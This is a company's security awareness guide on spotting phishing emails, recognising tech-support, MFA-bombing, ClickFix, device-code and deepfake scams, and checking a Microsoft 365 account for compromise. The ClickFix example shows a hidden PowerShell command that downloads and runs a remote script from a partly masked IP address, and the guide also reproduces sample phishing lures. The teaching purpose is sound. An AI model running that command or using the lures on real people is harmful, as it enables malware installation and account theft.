Resources · Security Awareness Guide

Know the threats. Stop the attack.

Everything your team needs to spot a phishing email, recognize the scams that follow, and check whether an account has already been compromised. Three chapters, plain English, current for 2026.

CHAPTER 01

Spot the phish

Eight red flags hidden in three emails. Hover each one to learn why it works and what to do instead.

Read chapter →
CHAPTER 02

Real-world scams

Rebuilt from attacks our team has pulled out of client inboxes, plus how to shut each one down.

Read chapter →
CHAPTER 03

Have I been hacked?

Six warning signs and a five-step Microsoft 365 checkup you can run in ten minutes.

Read chapter →
Chapter 01 · Spot the phish

Learn to spot a phishing email before you click.

Three real-looking emails, eight red flags hidden inside them. Hover anything that glows and the panel on the right explains why it works and what to do instead. Find all eight and you will catch most of what lands in your inbox.

CAUTION: This message came from outside your organization. Do not click links or open attachments unless you recognize the sender.
FromIT Helpdesk <helpdesk@yourcompany-support.net>
Toyou@yourcompany.com
SubjectMailbox upgrade summary

Dear user,

Our records shows your mailbox has reach 98% of it's storage limit and incoming messages may soon be rejected.

To upgrade your mailbox, open the attached summary and follow the steps inside.

HTMMailbox_Upgrade_Summary.htm12 KB
This is an automated message from the IT Helpdesk. Please do not reply to this email.
FromMicrosoft 365 Security <security-noreply@microsoft-365-security.com>
Toyou@yourcompany.com
SubjectSet up Microsoft Authenticator to keep access to your account
Microsoft 365

Hello,

Your organization now requires multifactor authentication for all accounts. To keep access to Outlook, Teams, and OneDrive, link the Microsoft Authenticator app to your account.

Scan with your phone camera to link AuthenticatorOpen your camera, point it at the code, and follow the prompts to finish setup.

Accounts that are not linked within 48 hours will be signed out of all devices until setup is complete.

Microsoft Corporation · One Microsoft Way, Redmond, WA 98052 · Privacy statement · Manage notifications
JMJenna Morales, Harbor Supply Co. · RE: RE: Invoice 20441
Jenna Morales <jenna@harborsupplyco.com> · Thu 4:47 PM
Hi Dave, quick heads up before Friday: we switched banks last week as part of our move to a new accounting system. Please use the updated ACH details below for 20441 and all future payments: First Coastal Bank, routing 011500120, account 4471 0093 8821. I'd appreciate you keeping this between us until the transition is finished, as we are still updating our other vendors.
Jenna Morales · Accounts Receivable
Harbor Supply Co. · (781) 555-0134
On Mon, 9:14 AM, Dave Whitman wrote:
Hi Jenna, received invoice 20441 for the March order. Everything matches the PO, so we'll release payment on Friday's run as usual. Thanks, Dave
On Mon, 8:52 AM, Jenna Morales wrote:
Morning Dave, invoice 20441 attached for the March order (PO 7731). Same terms as always, net 30. Let me know if anything looks off.
On Fri, 2:18 PM, Dave Whitman wrote:
Jenna, the March delivery came in this morning and the count matches. Go ahead and send the invoice when you're ready.
On Tue, 11:05 AM, Jenna Morales wrote:
Thanks Dave, PO 7731 is confirmed. The March order ships Thursday and should reach you Friday morning. Tracking to follow.
Red flag detector
0 of 8 found

Move your mouse over the email.

Anything that glows is a red flag. Hover it and this card explains why it works on people and what to do instead. There are eight to find across the three example cards. Use the arrows, tabs, or the flip button to move between them.

TipAttackers rarely use just one trick. Real phishing emails stack three or four of these at once.
The eight red flags
    Before you click, ask
    • Was I expecting this, from this person, right now?
    • Does the address after the @ match who they claim to be?
    • Is it asking for money, a password, or a change?
    • Would a phone call to a number I already have settle it?

    Two yeses or more to the wrong questions: report it, do not reply.

    2026 reality check

    AI fixed their spelling.

    Bad grammar used to catch most phishing. Generated emails now read perfectly, and they are personalized with details scraped from LinkedIn and your website. Lean on the sender address, the link, and the request instead.

    2026 reality check

    QR codes are links you cannot hover.

    "Scan to enable two-factor" and "scan to view your document" emails slip past link filters because the URL is in an image. Never scan a code from an email. Type the site address yourself.

    2026 reality check

    An MFA prompt you did not start is an attack.

    If your Authenticator app asks you to approve a sign-in while you are not signing in, someone has your password. Tap Deny, report it, and change the password right away.

    Chapter 02 · Real-world scams

    What they actually look like.

    Rebuilt from real attacks our team has removed from client inboxes. Names and companies changed, tricks identical. Under each one: the single detail that gives it away.

    security-center-code0x268d3.support-live.info/lock
    Microsoft|Security Computer LockerMicrosoft 365 · Support · Sign in
    It is common for scammers to target Windows users…
    Do not restart or use your computer. Do not attempt to close this page.
    Your computer is disabled. Please call Microsoft's technicians for free.
    Questionable activity discovery is the reason for the computer lockup.
    MicrosoftActivate license—  ▢  ✕
    Your computer has alerted us that it has been infected with a Trojan Spyware which emulated some questionable activity on your device.
    Scanner—  ▢  ✕
    ScanThreat detected · Trojan.Spyware.Win32
    Security Center

    Questionable activity was discovered to be associated with your device.
    Contact Microsoft Windows Tech Support as soon as possible.

    Operating system has been blocked due to questionable activity.Please Contact Windows Tech Support: +1 (888) 555-0142If you think this computer lockup was by error, please inform Windows Tech Support about this issue.
    MicrosoftExitProceed
    Microsoft: Contact Support+1 (888) 555-0142 (Security Helpline)

    Full-screen "your computer is locked" alerts

    This is a web page pretending to be Windows. It fills the screen, plays a siren, and shows a phone number. In 99% of cases nothing is installed. The goal is to get you on the phone so a "technician" can take remote control and charge your card. You land on it from a mistyped address, a bad ad, or a link in an email.

    How to fix it
    1. Do not call the number, and do not click anything on the page.
    2. Press Ctrl + Alt + Del and choose Sign out. Or press Ctrl + Shift + Esc, select your browser, and click End task.
    3. If the keyboard is frozen, hold the power button until the PC restarts.
    4. When you reopen the browser, do not click Restore pages.
    5. Tell your IT team so they can double check your system to be safe.
    freestreaming-hd.live
    Click Allow to confirm that you are not a robot
    5
    Norton SecurityGoogle Chrome · freestreaming-hd.live
    5 viruses detected on your PC
    Trojan.GenericKD.6543High
    Spyware.PasswordStealerHigh
    ProtectionExpired
    Clean nowLater
    McAfee Total ProtectionGoogle Chrome · freestreaming-hd.live
    Your subscription has expired
    0 days left. Your PC is unprotected.
    Renew now · 80% off
    3:41 AM9/3/2026

    Fake Windows notifications

    These pop-ups look like antivirus or Windows alerts but come from your browser. Somewhere along the way a website asked to show notifications and you clicked Allow, usually disguised as "prove you are not a robot" or "click Allow to play the video." Every button leads to a tech-support scam or a malware download.

    How to fix it
    1. Do not click the notification. Dismiss it with the X.
    2. Chrome: paste chrome://settings/content/notifications in the address bar and remove any site you do not recognize.
    3. Edge: paste edge://settings/content/notifications and do the same.
    4. Check chrome://extensions or edge://extensions and remove anything you did not install on purpose.
    5. Still flooded? Windows Settings → System → Notifications, and turn off notifications for the browser until it is cleaned up.
    3:41●●● ⌔ ▮
    +1 (312) 555-0199Unknown sender
    IT Helpdesk: we see failed logins on your account. Approve the sign-in prompt on your phone now so we can secure it. Reply with your 6-digit code if asked.
    Today 3:41 AM
    Microsoft Authenticatornow
    Approve sign-in?

    Outlook · Lagos, Nigeria · Chrome on Linux

    DenyApprove

    Text messages and MFA push bombing

    The attacker already has your password. They trigger sign-in after sign-in so your phone keeps buzzing, then text you pretending to be IT so you approve one "to make it stop." One tap and they are in. No IT team asks you to approve a prompt or read back a code.

    How to fix it
    1. Never approve a prompt you did not start. Choose Deny or It's not me.
    2. Do not reply to the text. Real IT never asks for codes.
    3. Change your password from a device you trust. The prompts stop when the password is wrong.
    4. Run the Chapter 03 checkup: sign-ins, security info, rules.
    5. Tell your IT team so they can lock the account down.
    docs-viewer-share.com/verify?ref=8821
    Verify you are human
    I am humanRay ID · 8f21ac
    Verification steps
    1Press Win + R
    2Press Ctrl + V
    3Press Enter
    Complete the steps above to view the document.
    Run

    Type the name of a program, folder, document, or Internet resource, and Windows will open it for you.

    Open:powershell -w hidden -c "irm http://185.203.x.x/a.ps1 | iex"
    OKCancelBrowse…

    "Verify you are human" that asks you to press keys (ClickFix)

    The page looks like a normal bot check, but the steps tell you to press Win + R, then Ctrl + V, then Enter. The site has silently copied a PowerShell command to your clipboard. Following the steps runs it, and it installs a password stealer or remote-access tool in seconds. No antivirus prompt, because you ran it yourself.

    How to fix it
    1. No real website ever asks you to open Run, Terminal, or PowerShell. Close the tab.
    2. Copy any harmless text to clear your clipboard.
    3. If you already pressed Enter, unplug the network cable or turn off Wi-Fi right away.
    4. Do not sign in to anything from that computer until it is checked.
    5. Tell your IT team so they can double check your system to be safe.
    login.microsoftonline.com/common/oauth2/deviceauth
    Marcus Thompson <marcus.thompson@harborsupplyco.com>
    Marcus shared "Q4 Pricing Review.xlsx" with you

    Marcus Thompson has shared a document with you. Open

    Verify to view the document

    Copy this verification code, then continue to Microsoft and paste it to open the file.

    BQ7X4KLMCopyContinue to Microsoft →
    Enter code

    Enter the code displayed on your app or device.

    BQ7X4KLM
    Next

    Device code phishing (fake file-share invitation)

    It starts with a "shared a document with you" email. The Open button lands on a look-alike page that gives you a verification code and a "Continue to Microsoft" button. That button goes to the real Microsoft sign-in page, padlock and all. The code belongs to a sign-in the attacker started on their own computer. When you paste it and sign in, Microsoft hands them your session, MFA included, and they now have full access to your account.

    How to fix it
    1. Real file shares open the file directly. No legitimate share ever asks you to copy a code into a Microsoft sign-in page.
    2. You only need a device code when you are signing in on a TV, printer, or terminal you started. Never type a code a website or email gave you.
    3. If you entered one: go to mysignins.microsoft.com and choose Sign out everywhere.
    4. Change your password from a device you trust.
    5. Tell your IT team so they can revoke the attacker's session. Ask us about turning off device code sign-in for your company; most businesses never need it.
    Video meeting with six participants; the CFO tile is an AI impersonation

    Real-time deepfake video and audio

    A few seconds of audio from a voicemail or webinar is enough to clone a voice. Live face-swap tools put that person on a video call. The "CFO" on the call asks finance to wire a deposit today and keep it quiet until the deal closes. Everyone on the call recognizes the face and voice, and the money is gone. Attackers use it for wires, payroll changes, gift cards, and password resets.

    How to fix it
    1. Any payment, payroll, or credential change gets a callback on a number you already have, no matter who asked or how.
    2. Agree on a spoken code word for urgent requests. A clone will not know it.
    3. Urgency plus secrecy is the tell. A real executive can wait for verification.
    4. Ask them to turn their head fully sideways or wave a hand in front of their face. Live fakes glitch.
    5. Tell your IT team so they can warn the rest of the company.
    Chapter 03 · Have I been hacked?

    Check your Microsoft 365 account in five steps.

    Every hack is different, but the first signs are the same. If any of these feel familiar, run the checkup below. It takes about ten minutes and works for any Microsoft 365 business account.

    Your inbox goes quietNew mail stops arriving or drops off sharply. Attackers hide messages so you do not see replies.
    Bounce-backs for mail you never sentDelivery failures for messages you did not write mean your account is sending them.
    Logged out for no reasonAn active session ends unexpectedly, or you are asked to sign in again on every device.
    Alerts you did not triggerEmails or texts about password resets, new sign-ins, or new security info being added.
    Authenticator prompts out of nowhereYour phone asks you to approve a sign-in while you are not signing in. Someone has your password.
    A client asks about a change you never madeA vendor or customer calls to confirm new bank details or an invoice you never sent.
    1Step one

    Sign in the safe way.

    Type the address yourself in the address bar at the top of the browser, never in a search box. Scammers buy search ads that look exactly like Microsoft and lead to fake sign-in pages.

    Business accountm365.cloud.microsoftoroffice.com
    Personal @outlook.com / @hotmail.comoutlook.live.com
    • Bookmark the sign-in page once and use the bookmark from then on.
    • Never sign in from a link inside the suspicious email or text.
    https://m365.cloud.microsoft
    SPONSORED
    login-microsoft365-secure.com
    Microsoft 365 Login | Sign in to your account
    Access Outlook, Word, Excel and more. Sign in securely to your Office 365 account…
    2Step two

    Review your recent sign-ins.

    Click your photo or initials in the top-right corner, choose View account, then My sign-ins. You can also go straight to mysignins.microsoft.com.

    Your initialsView accountMy sign-insRecent activity
    • Look for cities you were not in, hours you were asleep, and devices or browsers you do not use.
    • A burst of "Unsuccessful" attempts means someone is guessing your password.
    • Any sign-in you do not recognize: choose This wasn't me and continue to step three.
    Using a VPN? Your own sign-ins may show a different city or state. Match the times to your day before you worry.
    Recent activitymysignins.microsoft.com
    Boston, MA, US · Windows · Microsoft Edge
    Today, 8:12 AM · Outlook on the web
    Successful
    Lagos, Nigeria · Linux · Chrome
    Today, 3:41 AM · Outlook on the web · This wasn't me
    Successful
    Unknown location · Unknown browser
    Today, 2:58 AM to 3:39 AM · 14 attempts
    Unsuccessful
    Scituate, MA, US · iOS · Outlook mobile
    Yesterday, 6:05 PM
    Successful
    3Step three

    Check your security info.

    Every phone number, email address, and Authenticator app listed here can be used to get into your account. Attackers add their own so they can get back in even after you change your password.

    My sign-insSecurity info
    • First, make sure your own method is there and works (your phone, your Authenticator).
    • Then delete every method you do not recognize. Unknown phone numbers, Gmail addresses, "Samsung" or "Android" Authenticator entries you never set up.
    • Do not use a personal Gmail or Yahoo address as a recovery method. A breach there becomes a breach here.
    Security infomysignins.microsoft.com/security-info
    Microsoft Authenticator · iPhone (yours)
    Default sign-in method · added Jan 2024
    Keep
    Phone · +1 781 ••• 0660
    Text or call
    Keep
    Microsoft Authenticator · SM-A125F
    Added 2 days ago · 3:44 AM
    Delete
    Email · recovery.svc.9921@gmail.com
    Added 2 days ago · 3:46 AM
    Delete
    4Step four

    Look for tampering in Outlook.

    Open Outlook on the web at outlook.office.com, click the gear icon in the top right, then Mail. The same settings exist in the new Outlook desktop app under the same gear.

    GearMailRules·Forwarding·Junk email
    • Rules: anything you did not create, especially rules that move mail to RSS Feeds, Archive, Deleted Items, or Junk, or that delete messages containing words like invoice, payment, or password. Turn it off, then delete it.
    • Forwarding: should be off unless you set it up. An unknown address here is the attacker reading your mail.
    • Junk email: check Blocked senders for your bank, your IT team, or vendors. Attackers block alerts so you never see them.
    • Also glance at Sent Items and Deleted Items for messages you did not write.
    LayoutComposeRulesSweepJunk emailForwarding
    Newsletters to folder
    If from contains "newsletter", move to Reading
    ..
    If body contains "invoice" or "payment" or "wire", move to RSS Feeds and mark as read
    .
    If subject contains "password" or "sign-in", delete
    ForwardingMail → Forwarding
    Forward all my email to mail.archive.backup82@outlook.com
    Keep a copy of forwarded messages: off
    5Step five

    Found something? Lock it down, in this order.

    Order matters. If you change the password first, the attacker's backup phone number still lets them straight back in.

    • Fix security info: add your method back, delete theirs (step three).
    • Turn off and delete rogue rules and forwarding (step four).
    • Change your password from a device you trust: View account → Password.
    • On the Security info page choose Sign out everywhere to kill every active session.
    • Open myapps.microsoft.com, then your initials → Manage app permissions, and remove apps you do not recognize. Attackers add apps that read mail without a password.
    • Call your IT team so they can check the rest of the tenant, and warn anyone who may have received a fake request from your account.
    Do not panic. Attackers count on you freezing. A fifteen-minute checkup like this one closes the door in most cases, and your IT team can do the deep clean afterward.
    Lockdown checklist4 of 6 done
    Security info: my methods back, theirs deleted
    Rules and forwarding removed
    Password changed from a trusted device
    Signed out everywhere
    Unknown app permissions removed
    IT team notified, contacts warned
    Put it to the test

    Read the guide? Now prove it.

    The Threat Test drops ten real attacks in your inbox and scores how many red flags you catch. Five minutes, no hints, and a Certified Defender certificate if you score 90% or better.

    Think you've been hit? Call us right now.

    Wireguided clients get incident response around the clock. Not a client yet? Call anyway. We will walk you through the first hour, and there is no charge for the conversation.